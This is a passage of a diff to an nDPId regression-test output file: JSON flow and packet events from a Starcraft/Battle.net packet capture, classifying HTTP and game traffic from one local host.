+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1437389981197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981197,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EYNAAIAGHCvAqAFkUO+6Gg27AFBEOrW2AAAAAIACIAB5\/gAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1437389981256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981256,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDbuOe0nfRDq1t2ASOQixoAAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1437389981256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981256,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEYRAAIAGHDbAqAFkUO+6Gg27AFBEOrW3jntJ4FAQ+vAHdQAA"} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":304,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981197,"flow_last_seen":1437389981265,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389981265,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3515,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389981330,"flow_last_seen":1437389981330,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389981330,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1437389981330,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389981330,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RD1AAIAG6XXAqAFkUO+6FQ28AFBBQIDMAAAAAIACIACx5gAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1437389981385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389981385,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDbzhin+3QUCAzWASOQhgoQAAAgQFtAAA"} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1437389981385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389981385,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRD9AAIAG6X\/AqAFkUO+6FQ28AFBBQIDN4Yp\/uFAQ+vC2dQAA"} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389981330,"flow_last_seen":1437389981385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389981385,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982130,"flow_last_seen":1437389982130,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982130,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1437389982130,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982130,"pkt":"hCYVPnXEIImEa8W6CABFAAA0Zr9AAIAGfH3AqAFk1fh\/gg29BF8F03V0AAAAAIACgABKLQAAAgQFtAEDAwABAQQC"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982140,"flow_last_seen":1437389982140,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982140,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1437389982140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982140,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EY9AAIAGHB\/AqAFkUO+6Gg2+AFAFq5RDAAAAAIACIADZ\/QAAAgQFtAEDAwgBAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1437389982182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982182,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADIGMUXV+H+CwKgBZARfDb3bZ8BEBdN1dWASFtBArgAAAgQFtAAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1437389982183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982183,"pkt":"hCYVPnXEIImEa8W6CABFAAAoZsBAAIAGfIjAqAFk1fh\/gg29BF8F03V122fARVAQgADvOgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1437389982197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982197,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDb7iEHr2BauURGASOQiM8wAAAgQFtAAA"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1437389982197,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982197,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZBAAIAGHCrAqAFkUO+6Gg2+AFAFq5RE4hB691AQ+vDixwAA"} +00827{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":329,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982140,"flow_last_seen":1437389982207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389982207,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/alert?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982269,"flow_last_seen":1437389982269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389982269,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1437389982269,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389982269,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RElAAIAG6WnAqAFkUO+6FQ2\/AFB8c4vnAAAAAIACIABrlQAAAgQFtAEDAwgBAQQC"} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":333,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982130,"flow_last_seen":1437389982277,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1437389982277,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.130","src_port":3517,"dst_port":1119,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Starcraft","breed":"Fun","category":"Game"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1437389982326,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389982326,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDb8Q\/FwJfHOL6GASOQgOjQAAAgQFtAAA"} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":336,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1437389982327,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389982327,"pkt":"hCYVPnXEIImEa8W6CABFAAAoREtAAIAG6XPAqAFkUO+6FQ2\/AFB8c4voEPxcClAQ+vBkYQAA"} +00814{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":337,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389982269,"flow_last_seen":1437389982327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1437389982327,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3519,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/alert\/en-gb","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"5.42.180.154","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1437389982769,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":1437389982769,"pkt":"hCYVPnXEIImEa8W6CABFAAAeGS0AAIARpdHAqAFkBSq0ms+aBF8ACqcOCQE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982769,"flow_last_seen":1437389982769,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1437389982769,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"62.115.246.51","src_port":53146,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -165,153 +165,153 @@ 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389982884,"flow_last_seen":1437389982884,"flow_idle_time":180000,"flow_min_l4_payload_len":1,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":1,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1437389982884,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"213.248.127.166","src_port":6113,"dst_port":1119,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1437389982884,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":43,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":43,"pkt_l4_len":9,"thread_ts_msec":1437389982884,"pkt":"hCYVPnXEIImEa8W6CABFAAAdDfMAAIARFTLAqAFk1fh\/phfhBF8ACcjwAw=="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1437389982933,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":15,"thread_ts_msec":1437389982933,"pkt":"IImEa8W6hCYVPnXECABFAAAjAABAADMRMB\/V+H+mwKgBZARfF+EAD6SGBF05\/GkEgAAAAAAAAAAAAAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983663,"flow_last_seen":1437389983663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983663,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1437389983663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983663,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EZpAAIAGHBTAqAFkUO+6Gg3BAFD6MpY\/AAAAAIACIADjdgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983723,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcFck85k+jKWQGASOQjIewAAAgQFtAAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983723,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEZtAAIAGHB\/AqAFkUO+6Gg3BAFD6MpZAXJPOZVAQ+vAeUAAA"} -00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983663,"flow_last_seen":1437389983723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1437389983723,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3521,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"nydus.battle.net","url":"nydus.battle.net\/S2\/enGB\/client\/regions?build=enGB&targetRegion=EU","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389983788,"flow_last_seen":1437389983788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389983788,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1437389983788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389983788,"pkt":"hCYVPnXEIImEa8W6CABFAAA0RFRAAIAG6V7AqAFkUO+6FQ3CAFAtDsyVAAAAAIACIAB6SQAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389983846,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGertQ77oVwKgBZABQDcLXOt3ELQ7MlmASOQjVRgAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389983846,"pkt":"hCYVPnXEIImEa8W6CABFAAAoRFZAAIAG6WjAqAFkUO+6FQ3CAFAtDsyW1zrdxVAQ+vArGwAA"} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389983788,"flow_last_seen":1437389983846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1437389983846,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.21","src_port":3522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"eu.launcher.battle.net","url":"eu.launcher.battle.net\/service\/s2\/regionsxml\/regions.xml","code":0,"content_type":"","user_agent":"Battle.net Web Client"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985308,"flow_last_seen":1437389985308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985308,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1437389985308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985308,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EaZAAIAGHAjAqAFkUO+6Gg3DAFAjjlJ6AAAAAIACIAD93gAAAgQFtAEDAwgBAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1437389985320,"flow_last_seen":1437389985320,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1437389985320,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1437389985320,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1437389985320,"pkt":"hCYVPnXEIImEa8W6CABFAAA0EadAAIAGHAfAqAFkUO+6Gg3EAFAnGJJ3AAAAAIACIAC6VgAAAgQFtAEDAwgBAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1437389985363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1437389985363,"pkt":"IImEa8W6hCYVPnXECABFAAAsAABAADMGerZQ77oawKgBZABQDcNyhhfoI45Se2ASOQiDbQAAAgQFtAAA"} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1437389985363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1437389985363,"pkt":"hCYVPnXEIImEa8W6CABFAAAoEahAAIAGHBLAqAFkUO+6Gg3DAFAjjlJ7coYX6VAQ+vDZQQAA"} -00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"starcraft_battle.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1437389985308,"flow_last_seen":1437389985373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1437389985373,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"80.239.186.26","src_port":3523,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 